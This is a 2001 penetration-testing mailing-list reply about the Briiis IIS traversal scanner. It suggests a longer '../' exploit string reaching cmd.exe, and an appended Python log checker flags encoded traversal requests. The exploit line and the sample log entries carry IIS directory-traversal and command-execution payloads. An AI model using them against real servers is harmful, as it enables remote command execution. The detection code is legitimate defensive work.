Penetration Testing mailing list archives

Re: iXsecurity.tool.briiis.3.02


From: Nicolas Gregoire <nicolas.gregoire () 7thzone com>
Date: Wed, 13 Jun 2001 18:49:25 +0200


ian.vitek () ixsecurity com wrote :

> Briiis is a tool for testing web servers for "/" encoding
> break out from web root vulnerability from an executable
> directory.

Your tool doesn't find all vulnerable hosts.
The "exploit string" (i.e. $explstr in the program) doesn't contain (in
some cases) enough "../" and can't be used to access up to c:\

Here are the modifications I made to your toy:
OLD LINE :
$explstr="/..$opt_F..$opt_F..$opt_F..$opt_F..${opt_F}winnt/system32/cmd.exe?/c+$opt_c"
if ($opt_c);
NEW LINE :
$explstr="/..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F../winnt/system32/cmd.exe?/c+$opt_c"
if ($opt_c);

Thanks for the list of directories, I was looking for a good one.

NB: last time I checked it, the unicoder.pl tool from HD Moore couldn't
find non-English vulnerable versions of IIS (it is looking for
"Directory of" in the returned content and it's, for example,
"Répertoire de" in French).

Please excuse my poor English.
Nicob
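
The blind spot described in this message (a traversal string pinned to one depth) applies equally to log signatures on the defending side. The following is an added example, not part of the original post or of Briiis: a Python check that decodes each request path leniently and flags any request that climbs above the URL root, whatever the number of "../" steps or the encoding of the slash. The log lines, the "/execdir" directory name and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+)')
# Constructed sample access-log lines (not from the original post).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Jun/2001:18:40:01 +0200] "GET /execdir/..%c0%af..%c0%af..%c0%af'
    '..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 -',
    '192.0.2.10 - - [13/Jun/2001:18:40:02 +0200] "GET /execdir/sub/..%255c..%255c..%255c'
    '../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 -',
    '192.0.2.44 - - [13/Jun/2001:18:41:10 +0200] "GET /docs/../index.html HTTP/1.0" 200 1043',
    '192.0.2.44 - - [13/Jun/2001:18:41:12 +0200] "GET /images/logo.gif HTTP/1.0" 200 2210',
]

def lenient_decode(raw: str) -> str:
    """Repeated %-decoding, overlong 2-byte UTF-8 folded to ASCII, '\\' read as '/'."""
    data = raw.encode("utf-8")
    for _ in range(3):  # bounded loop; also unwraps double encoding
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    out, i = bytearray(), 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and (data[i + 1] & 0xC0) == 0x80:
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))  # overlong form
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode("latin-1").replace("\\", "/")

def escape_depth(raw_path: str) -> int:
    """Levels the path climbs above the URL root (0 = never leaves it)."""
    depth = lowest = 0
    for seg in lenient_decode(raw_path.split("?", 1)[0]).split("/"):
        if seg in ("", "."):
            continue
        depth += -1 if seg == ".." else 1
        lowest = min(lowest, depth)
    return -lowest

def flag_requests(log_lines):
    """Return (depth, request path) for every request that escapes the root."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and escape_depth(m.group(1)) > 0:
            hits.append((escape_depth(m.group(1)), m.group(1)))
    return hits

if __name__ == "__main__":
    for depth, path in flag_requests(SAMPLE_LOG):
        print(depth, path)
```

The depth is measured against the URL root, since the log does not reveal how deep the web root sits on disk; any positive value is therefore flagged. A literal match on one encoded form would catch only the first of the two constructed traversal lines.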

